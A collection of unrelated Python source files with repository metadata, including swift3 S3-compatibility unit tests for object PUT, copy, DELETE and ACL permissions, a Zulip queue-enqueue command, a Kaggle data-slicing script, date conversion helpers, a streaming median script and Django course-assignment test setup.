        # ...even if versionId appears last
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?bar=baz&versionId=foo'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?versionId=foo'})
self.assertEqual(code, 'NotImplemented')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/src_bucket/src_object',
'X-Amz-Copy-Source-Range': 'bytes=0-0'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPRequestTimeout)
self.assertEqual(code, 'RequestTimeout')
@s3acl
def test_object_PUT(self):
etag = self.response_headers['etag']
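        # S3 sends Content-MD5 as the base64 encoding of the raw MD5 digest,
        # while the etag is its hex form; hence the hex-decode and
        # base64-encode below.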
content_md5 = etag.decode('hex').encode('base64').strip()
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS test:tester:hmac',
'x-amz-storage-class': 'STANDARD',
'Content-MD5': content_md5,
'Date': self.get_date_header()},
body=self.object_body)
req.date = datetime.now()
req.content_type = 'text/plain'
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '200')
# Check that swift3 returns an etag header.
self.assertEqual(headers['etag'], '"%s"' % etag)
_, _, headers = self.swift.calls_with_headers[-1]
# Check that swift3 converts a Content-MD5 header into an etag.
self.assertEqual(headers['etag'], etag)
def test_object_PUT_headers(self):
content_md5 = self.etag.decode('hex').encode('base64').strip()
self.swift.register('HEAD', '/v1/AUTH_test/some/source',
swob.HTTPOk, {'last-modified': self.last_modified},
None)
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS test:tester:hmac',
'X-Amz-Storage-Class': 'STANDARD',
'X-Amz-Meta-Something': 'oh hai',
'X-Amz-Meta-Unreadable-Prefix': '\x04w',
'X-Amz-Meta-Unreadable-Suffix': 'h\x04',
'X-Amz-Meta-Lots-Of-Unprintable': 5 * '\x04',
'X-Amz-Copy-Source': '/some/source',
'Content-MD5': content_md5,
'Date': self.get_date_header()})
req.date = datetime.now()
req.content_type = 'text/plain'
status, headers, body = self.call_swift3(req)
        # Check that swift3 does not return an etag header when a copy
        # source is specified.
self.assertTrue(headers.get('etag') is None)
# Check that swift3 does not return custom metadata in response
self.assertTrue(headers.get('x-amz-meta-something') is None)
_, _, headers = self.swift.calls_with_headers[-1]
# Check that swift3 converts a Content-MD5 header into an etag.
self.assertEqual(headers['ETag'], self.etag)
self.assertEqual(headers['X-Object-Meta-Something'], 'oh hai')
self.assertEqual(headers['X-Object-Meta-Unreadable-Prefix'],
'=?UTF-8?Q?=04w?=')
self.assertEqual(headers['X-Object-Meta-Unreadable-Suffix'],
'=?UTF-8?Q?h=04?=')
self.assertEqual(headers['X-Object-Meta-Lots-Of-Unprintable'],
'=?UTF-8?B?BAQEBAQ=?=')
self.assertEqual(headers['X-Copy-From'], '/some/source')
self.assertEqual(headers['Content-Length'], '0')
def _test_object_PUT_copy(self, head_resp, put_header=None,
src_path='/some/source', timestamp=None):
account = 'test:tester'
grants = [Grant(User(account), 'FULL_CONTROL')]
head_headers = \
encode_acl('object',
ACL(Owner(account, account), grants))
head_headers.update({'last-modified': self.last_modified})
self.swift.register('HEAD', '/v1/AUTH_test/some/source',
head_resp, head_headers, None)
put_header = put_header or {}
return self._call_object_copy(src_path, put_header, timestamp)
def _test_object_PUT_copy_self(self, head_resp,
put_header=None, timestamp=None):
account = 'test:tester'
grants = [Grant(User(account), 'FULL_CONTROL')]
head_headers = \
encode_acl('object',
ACL(Owner(account, account), grants))
head_headers.update({'last-modified': self.last_modified})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
head_resp, head_headers, None)
put_header = put_header or {}
return self._call_object_copy('/bucket/object', put_header, timestamp)
def _call_object_copy(self, src_path, put_header, timestamp=None):
put_headers = {'Authorization': 'AWS test:tester:hmac',
'X-Amz-Copy-Source': src_path,
'Date': self.get_date_header()}
put_headers.update(put_header)
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers=put_headers)
req.date = datetime.now()
req.content_type = 'text/plain'
timestamp = timestamp or time.time()
with patch('swift3.utils.time.time', return_value=timestamp):
return self.call_swift3(req)
@s3acl
def test_object_PUT_copy(self):
def do_test(src_path=None):
date_header = self.get_date_header()
timestamp = mktime(date_header)
last_modified = S3Timestamp(timestamp).s3xmlformat
status, headers, body = self._test_object_PUT_copy(
swob.HTTPOk, put_header={'Date': date_header},
timestamp=timestamp, src_path=src_path)
self.assertEqual(status.split()[0], '200')
self.assertEqual(headers['Content-Type'], 'application/xml')
self.assertTrue(headers.get('etag') is None)
self.assertTrue(headers.get('x-amz-meta-something') is None)
elem = fromstring(body, 'CopyObjectResult')
self.assertEqual(elem.find('LastModified').text, last_modified)
self.assertEqual(elem.find('ETag').text, '"%s"' % self.etag)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertEqual(headers['X-Copy-From'], '/some/source')
self.assertEqual(headers['Content-Length'], '0')
do_test('/some/source')
do_test('/some/source?')
do_test('/some/source?versionId=null')
# Some clients (like Boto) don't include the leading slash;
# AWS seems to tolerate this so we should, too
do_test('some/source')
@s3acl
def test_object_PUT_copy_self(self):
status, headers, body = \
self._test_object_PUT_copy_self(swob.HTTPOk)
self.assertEqual(status.split()[0], '400')
elem = fromstring(body, 'Error')
err_msg = ("This copy request is illegal because it is trying to copy "
"an object to itself without changing the object's "
"metadata, storage class, website redirect location or "
"encryption attributes.")
self.assertEqual(elem.find('Code').text, 'InvalidRequest')
self.assertEqual(elem.find('Message').text, err_msg)
@s3acl
def test_object_PUT_copy_self_metadata_copy(self):
header = {'x-amz-metadata-directive': 'COPY'}
status, headers, body = \
self._test_object_PUT_copy_self(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '400')
elem = fromstring(body, 'Error')
err_msg = ("This copy request is illegal because it is trying to copy "
"an object to itself without changing the object's "
"metadata, storage class, website redirect location or "
"encryption attributes.")
self.assertEqual(elem.find('Code').text, 'InvalidRequest')
self.assertEqual(elem.find('Message').text, err_msg)
@s3acl
def test_object_PUT_copy_self_metadata_replace(self):
date_header = self.get_date_header()
timestamp = mktime(date_header)
last_modified = S3Timestamp(timestamp).s3xmlformat
header = {'x-amz-metadata-directive': 'REPLACE',
'Date': date_header}
status, headers, body = self._test_object_PUT_copy_self(
swob.HTTPOk, header, timestamp=timestamp)
self.assertEqual(status.split()[0], '200')
self.assertEqual(headers['Content-Type'], 'application/xml')
self.assertTrue(headers.get('etag') is None)
elem = fromstring(body, 'CopyObjectResult')
self.assertEqual(elem.find('LastModified').text, last_modified)
self.assertEqual(elem.find('ETag').text, '"%s"' % self.etag)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertEqual(headers['X-Copy-From'], '/bucket/object')
self.assertEqual(headers['Content-Length'], '0')
@s3acl
def test_object_PUT_copy_headers_error(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPPreconditionFailed,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = {'X-Amz-Copy-Source-If-None-Match': etag}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPNotModified,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = {'X-Amz-Copy-Source-If-Modified-Since': last_modified_since}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPNotModified,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = \
{'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPPreconditionFailed,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
def test_object_PUT_copy_headers_with_match(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 11:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'X-Amz-Copy-Source-If-Modified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 2)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-Match'], etag)
self.assertEqual(headers['If-Modified-Since'], last_modified_since)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_headers_with_match_and_s3acl(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 11:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'X-Amz-Copy-Source-If-Modified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 3)
        # When s3acl is enabled, after the copy source check passes,
        # swift3 checks the bucket write permissions of the destination.
_, _, headers = self.swift.calls_with_headers[-2]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-Match'], etag)
self.assertEqual(headers['If-Modified-Since'], last_modified_since)
def test_object_PUT_copy_headers_with_not_match(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-None-Match': etag,
'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 2)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-None-Match') is None)
self.assertTrue(headers.get('If-Unmodified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-None-Match'], etag)
self.assertEqual(headers['If-Unmodified-Since'], last_modified_since)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_headers_with_not_match_and_s3acl(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-None-Match': etag,
'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
        # When s3acl is enabled, after the copy source check passes,
        # swift3 checks the bucket write permissions of the destination.
self.assertEqual(len(self.swift.calls_with_headers), 3)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-None-Match') is None)
self.assertTrue(headers.get('If-Unmodified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-None-Match'], etag)
self.assertEqual(headers['If-Unmodified-Since'], last_modified_since)
@s3acl
def test_object_POST_error(self):
code = self._test_method_error('POST', '/bucket/object', None)
self.assertEqual(code, 'NotImplemented')
@s3acl
def test_object_DELETE_error(self):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
with patch('swift3.request.get_container_info',
return_value={'status': 204}):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchKey')
with patch('swift3.request.get_container_info',
return_value={'status': 404}):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchBucket')
@s3acl
@patch('swift3.cfg.CONF.allow_multipart_uploads', False)
def test_object_DELETE_no_multipart(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '204')
self.assertNotIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
_, path = self.swift.calls[-1]
self.assertEqual(path.count('?'), 0)
@s3acl
def test_object_DELETE_multipart(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '204')
self.assertIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
_, path = self.swift.calls[-1]
self.assertEqual(path.count('?'), 0)
@s3acl
def test_slo_object_DELETE(self):
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPOk,
{'x-static-large-object': 'True'},
None)
self.swift.register('DELETE', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, {}, '<SLO delete results>')
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header(),
'Content-Type': 'foo/bar'})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '204')
self.assertEqual(body, '')
self.assertIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'
'?multipart-manifest=delete'),
self.swift.calls)
_, path, headers = self.swift.calls_with_headers[-1]
path, query_string = path.split('?', 1)
query = {}
for q in query_string.split('&'):
key, arg = q.split('=')
query[key] = arg
self.assertEqual(query['multipart-manifest'], 'delete')
self.assertNotIn('Content-Type', headers)
def _test_object_for_s3acl(self, method, account):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': method},
headers={'Authorization': 'AWS %s:hmac' % account,
'Date': self.get_date_header()})
return self.call_swift3(req)
def _test_set_container_permission(self, account, permission):
grants = [Grant(User(account), permission)]
headers = \
encode_acl('container',
ACL(Owner('test:tester', 'test:tester'), grants))
self.swift.register('HEAD', '/v1/AUTH_test/bucket',
swob.HTTPNoContent, headers, None)
@s3acl(s3acl_only=True)
def test_object_GET_without_permission(self):
status, headers, body = self._test_object_for_s3acl('GET',
'test:other')
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_GET_with_read_permission(self):
status, headers, body = self._test_object_for_s3acl('GET',
'test:read')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_GET_with_fullcontrol_permission(self):
status, headers, body = \
self._test_object_for_s3acl('GET', 'test:full_control')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_without_permission(self):
status, headers, body = self._test_object_for_s3acl('PUT',
'test:other')
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_PUT_with_owner_permission(self):
status, headers, body = self._test_object_for_s3acl('PUT',
'test:tester')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_with_write_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'WRITE')
status, headers, body = self._test_object_for_s3acl('PUT', account)
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_with_fullcontrol_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'FULL_CONTROL')
status, headers, body = \
self._test_object_for_s3acl('PUT', account)
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_DELETE_without_permission(self):
account = 'test:other'
status, headers, body = self._test_object_for_s3acl('DELETE',
account)
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_owner_permission(self):
status, headers, body = self._test_object_for_s3acl('DELETE',
'test:tester')
self.assertEqual(status.split()[0], '204')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_write_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'WRITE')
status, headers, body = self._test_object_for_s3acl('DELETE',
account)
self.assertEqual(status.split()[0], '204')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_fullcontrol_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'FULL_CONTROL')
status, headers, body = self._test_object_for_s3acl('DELETE', account)
self.assertEqual(status.split()[0], '204')
def _test_object_copy_for_s3acl(self, account, src_permission=None,
src_path='/src_bucket/src_obj'):
owner = 'test:tester'
grants = [Grant(User(account), src_permission)] \
if src_permission else [Grant(User(owner), 'FULL_CONTROL')]
src_o_headers = \
encode_acl('object', ACL(Owner(owner, owner), grants))
src_o_headers.update({'last-modified': self.last_modified})
self.swift.register(
'HEAD', join('/v1/AUTH_test', src_path.lstrip('/')),
swob.HTTPOk, src_o_headers, None)
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS %s:hmac' % account,
'X-Amz-Copy-Source': src_path,
'Date': self.get_date_header()})
return self.call_swift3(req)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_owner_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:tester')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_fullcontrol_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:full_control',
'FULL_CONTROL')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_grantee_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:write', 'READ')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_without_src_obj_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:write')
self.assertEqual(status.split()[0], '403')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_without_dst_container_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:other', 'READ')
self.assertEqual(status.split()[0], '403')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_empty_src_path(self):
self.swift.register('PUT', '/v1/AUTH_test/bucket/object',
swob.HTTPPreconditionFailed, {}, None)
status, headers, body = self._test_object_copy_for_s3acl(
'test:write', 'READ', src_path='')
self.assertEqual(status.split()[0], '400')
class TestSwift3ObjNonUTC(TestSwift3Obj):
def setUp(self):
self.orig_tz = os.environ.get('TZ', '')
os.environ['TZ'] = 'EST+05EDT,M4.1.0,M10.5.0'
time.tzset()
super(TestSwift3ObjNonUTC, self).setUp()
def tearDown(self):
super(TestSwift3ObjNonUTC, self).tearDown()
os.environ['TZ'] = self.orig_tz
time.tzset()
if __name__ == '__main__':
unittest.main()
|
swiftstack/swift3-stackforge
|
swift3/test/unit/test_obj.py
|
Python
|
apache-2.0
| 47,051
|
import sys
from argparse import ArgumentParser
from typing import IO, Any
import orjson
from django.core.management.base import BaseCommand
from zerver.lib.queue import queue_json_publish
def error(*args: Any) -> None:
raise Exception('We cannot enqueue because settings.USING_RABBITMQ is False.')
class Command(BaseCommand):
help = """Read JSON lines from a file and enqueue them to a worker queue.
Each line in the file should either be a JSON payload or two tab-separated
fields, the second of which is a JSON payload. (The latter is to accommodate
the format of error files written by queue workers that catch exceptions--their
first field is a timestamp that we ignore.)
You can use "-" to represent stdin.
"""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument('queue_name', metavar='<queue>', type=str,
help="name of worker queue to enqueue to")
parser.add_argument('file_name', metavar='<file>', type=str,
help="name of file containing JSON lines")
def handle(self, *args: Any, **options: str) -> None:
queue_name = options['queue_name']
file_name = options['file_name']
if file_name == '-':
f: IO[str] = sys.stdin
else:
f = open(file_name)
while True:
line = f.readline()
if not line:
break
line = line.strip()
try:
payload = line.split('\t')[1]
except IndexError:
payload = line
print(f'Queueing to queue {queue_name}: {payload}')
# Verify that payload is valid json.
data = orjson.loads(payload)
# This is designed to use the `error` method rather than
# the call_consume_in_tests flow.
queue_json_publish(queue_name, data, error)
|
brainwane/zulip
|
zerver/management/commands/enqueue_file.py
|
Python
|
apache-2.0
| 1,916
|
#! /usr/bin/env python
from __future__ import print_function, division
import os
import sys
import pandas as pd
time_split = 786239 - 10 * 7 * 24 * 60 # use last 10 weeks for validation
# split up grid by making horizontal slices
num_slices = 32
slice_height = 10.0 / num_slices + 1e-6
slice_overlap = 0.1
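# With num_slices = 32 each slice spans roughly 10 / 32 = 0.3125 units of y
# (the 1e-6 fudge keeps y == 10.0 inside the last slice), and training slices
# extend slice_overlap = 0.1 units past both edges, so points near a boundary
# appear in two neighbouring training slices.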
def gen_slice(df_train, df_test, i):
slice_start = i * slice_height
slice_end = (i + 1) * slice_height
print('Generating slice %d: %.3f to %.3f' % (i, slice_start, slice_end))
# create train slice
train_slice = df_train[
(df_train.y >= slice_start - slice_overlap) &
(df_train.y < slice_end + slice_overlap)].copy()
train_slice[['row_id', 'x', 'y', 'accuracy', 'time', 'place_id']].to_csv(
'%s/s%i_train.csv' % (output_dir, i), index=False)
# create test slice
test_slice = df_test[
(df_test.y >= slice_start) &
(df_test.y < slice_end)]
test_slice[['row_id', 'x', 'y', 'accuracy', 'time']].to_csv(
'%s/s%i_test.csv' % (output_dir, i), index=False)
# create train & test slices for validation
# - split based on time
# - remove unseen place_id's from validation set
vtrain_slice = train_slice[train_slice.time <= time_split]
vtrain_slice[['row_id', 'x', 'y', 'accuracy', 'time', 'place_id']].to_csv(
'%s/s%i_vtrain.csv' % (output_dir, i), index=False)
place_ids = set(vtrain_slice.place_id.unique())
vtest_slice = train_slice[
(train_slice.y >= slice_start) &
(train_slice.y < slice_end) &
(train_slice.time > time_split) &
(train_slice.place_id.isin(place_ids))]
vtest_slice[['row_id', 'x', 'y', 'accuracy', 'time', 'place_id']].to_csv(
'%s/s%i_vtest.csv' % (output_dir, i), index=False)
if __name__ == '__main__':
if len(sys.argv) != 4:
print("Expected 3 arguments: train_filename test_filename output_dir",
file=sys.stderr)
sys.exit(1)
train_filename = sys.argv[1]
test_filename = sys.argv[2]
output_dir = sys.argv[3]
if not os.path.exists(output_dir):
os.makedirs(output_dir)
df_train = pd.read_csv(train_filename)
df_test = pd.read_csv(test_filename)
for i in range(num_slices):
gen_slice(df_train, df_test, i)
|
mkliegl/kaggle-Facebook-V
|
create_slices.py
|
Python
|
mit
| 2,280
|
import time
from datetime import datetime, date
from dateutil.parser import parse as dateFromString
__all__ = ['todate',
'date2timestamp',
'timestamp2date',
'yyyymmdd2date',
'date2yyyymmdd',
'juldate2date',
'date2juldate',
'dateFromString',
'jstimestamp']
def todate(val):
'''Convert val to a datetime.date instance by trying several
    conversion algorithms.
    If all of them fail, raise a ValueError exception.
'''
if not val:
raise ValueError("Value not provided")
if isinstance(val, datetime):
return val.date()
elif isinstance(val, date):
return val
else:
try:
ival = int(val)
sval = str(ival)
if len(sval) == 8:
                return yyyymmdd2date(ival)
elif len(sval) == 5:
return juldate2date(val)
else:
raise ValueError
except Exception:
# Try to convert using the parsing algorithm
try:
return dateFromString(val).date()
except Exception:
raise ValueError("Could not convert %s to date" % val)
def date2timestamp(dte):
return time.mktime(dte.timetuple())
def jstimestamp(dte):
'''Convert a date to a javascript timestamp.
A Javascript timestamp is the number of milliseconds since
January 1, 1970 00:00:00 UTC.'''
return 1000*date2timestamp(dte)
def timestamp2date(tstamp):
"Converts a unix timestamp to a Python datetime object"
dt = datetime.fromtimestamp(tstamp)
if not dt.hour+dt.minute+dt.second+dt.microsecond:
return dt.date()
else:
return dt
def yyyymmdd2date(dte):
try:
y = dte // 10000
md = dte % 10000
m = md // 100
d = md % 100
return date(y, m, d)
except Exception:
raise ValueError('Could not convert %s to date' % dte)
def date2yyyymmdd(dte):
return dte.day + 100*(dte.month + 100*dte.year)
def juldate2date(val):
'''Convert from a Julian date/datetime to python date or datetime'''
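    # Worked round-trip example, hand-checked against the Excel-style 1900
    # serial convention this module appears to use:
    #   juldate2date(41730)            -> date(2014, 4, 1)
    #   date2juldate(date(2014, 4, 1)) -> 41730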
ival = int(val)
dec = val - ival
try:
val4 = 4*ival
yd = val4 % 1461
st = 1899
if yd >= 4:
st = 1900
yd1 = yd - 241
y = val4 // 1461 + st
if yd1 >= 0:
q = yd1 // 4 * 5 + 308
qq = q // 153
qr = q % 153
else:
q = yd // 4 * 5 + 1833
qq = q // 153
qr = q % 153
m = qq % 12 + 1
d = qr // 5 + 1
except Exception:
raise ValueError('Could not convert %s to date' % val)
if dec:
dec24 = 24*dec
hours = int(dec24)
minutes = int(60*(dec24 - hours))
tot_seconds = 60*(60*(dec24 - hours) - minutes)
seconds = int(tot_seconds)
microseconds = int(1000000*(tot_seconds-seconds))
return datetime(y, m, d, hours, minutes, seconds, microseconds)
else:
return date(y, m, d)
def date2juldate(val):
'''Convert from a python date/datetime to a Julian date & time'''
f = 12*val.year + val.month - 22803
fq = f // 12
fr = f % 12
dt = (fr*153 + 302)//5 + val.day + fq*1461//4
if isinstance(val, datetime):
return dt + (val.hour + (val.minute + (
val.second + 0.000001*val.microsecond)/60.)/60.)/24.
else:
return dt
|
artisavotins/ccy
|
ccy/dates/converters.py
|
Python
|
bsd-3-clause
| 3,457
|
pa<caret>th
|
siosio/intellij-community
|
python/testData/completion/className/orderingLocalBeforeStdlib/orderingLocalBeforeStdlib.py
|
Python
|
apache-2.0
| 11
|
import heapq
class StreamMedian(object):
"""mediana unui sir de numere"""
def __init__(self):
self.minHeap, self.maxHeap = [], []
self.N = 0
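    # Invariant (the standard two-heap median technique): maxHeap holds the
    # smaller half of the numbers, negated because heapq is a min-heap, and
    # minHeap holds the larger half; after each insert the heaps are equal in
    # size (N even) or maxHeap has one extra element (N odd), so the median is
    # -maxHeap[0] for odd N and the mean of the two tops for even N.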
def insert(self, num):
if self.N % 2 == 0:
heapq.heappush(self.maxHeap, -1*num)
self.N += 1
if len(self.minHeap) == 0:
return
if -1 * self.maxHeap[0] > self.minHeap[0]:
toMin = -1 * heapq.heappop(self.maxHeap)
toMax = heapq.heappop(self.minHeap)
heapq.heappush(self.maxHeap, -1 * toMax)
heapq.heappush(self.minHeap, toMin)
else:
toMin = -1 * heapq.heappushpop(self.maxHeap, -1*num)
heapq.heappush(self.minHeap, toMin)
self.N += 1
def getMedian(self):
if self.N % 2 == 0:
return (-1 * self.maxHeap[0] + self.minHeap[0]) / 2.0
else:
return -1 * self.maxHeap[0]
if __name__ == '__main__':
sm = StreamMedian()
while True:
x = input("numar: ")
x = int(x)
sm.insert(x)
print sm.getMedian()
|
kitz99/misc
|
some_algorithms/StreamMedian/mediana_nou.py
|
Python
|
mit
| 908
|
# Django & Python
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.conf.urls.static import static, settings
import json
# Models
from registrar.models import Course
from registrar.models import Teacher
from registrar.models import Assignment
from registrar.models import AssignmentSubmission
from registrar.models import EssayQuestion
from registrar.models import EssaySubmission
from registrar.models import MultipleChoiceQuestion
from registrar.models import MultipleChoiceSubmission
from registrar.models import ResponseQuestion
from registrar.models import ResponseSubmission
from registrar.models import TrueFalseQuestion
from registrar.models import TrueFalseSubmission
# View
from teacher.views import assignment
# Constants
TEST_USER_EMAIL = "ledo@gah.com"
TEST_USER_USERNAME = "Ledo"
TEST_USER_PASSWORD = "ContinentalUnion"
TEST_USER_EMAIL2 = "whalesquid@hideauze.com"
TEST_USER_USERNAME2 = "whalesquid"
TEST_USER_PASSWORD2 = "Evolvers"
# Notes:
# https://docs.djangoproject.com/en/1.7/topics/testing/tools/#assertions
# Create your tests here.
class AssignmentTestCase(TestCase):
def tearDown(self):
courses = Course.objects.all()
for course in courses:
course.delete()
User.objects.all().delete()
def setUp(self):
# Create our Trudy user.
User.objects.create_user(
email=TEST_USER_EMAIL2,
username=TEST_USER_USERNAME2,
password=TEST_USER_PASSWORD2
)
user = User.objects.get(email=TEST_USER_EMAIL2)
teacher = Teacher.objects.create(user=user)
# Create our Student.
User.objects.create_user(
email=TEST_USER_EMAIL,
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
).save()
user = User.objects.get(email=TEST_USER_EMAIL)
teacher = Teacher.objects.create(user=user)
# Create a test course.
Course.objects.create(
id=1,
title="Comics Book Course",
sub_title="The definitive course on comics!",
category="",
teacher=teacher,
).save()
course = Course.objects.get(id=1)
Assignment.objects.create(
assignment_id=1,
assignment_num=1,
title="Hideauze",
description="Anime related assignment.",
worth=25,
course=course,
)
def get_logged_in_client(self):
client = Client()
client.login(
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
return client
def get_logged_in_trudy_client(self):
client = Client()
client.login(
username=TEST_USER_USERNAME2,
password=TEST_USER_PASSWORD2
)
return client
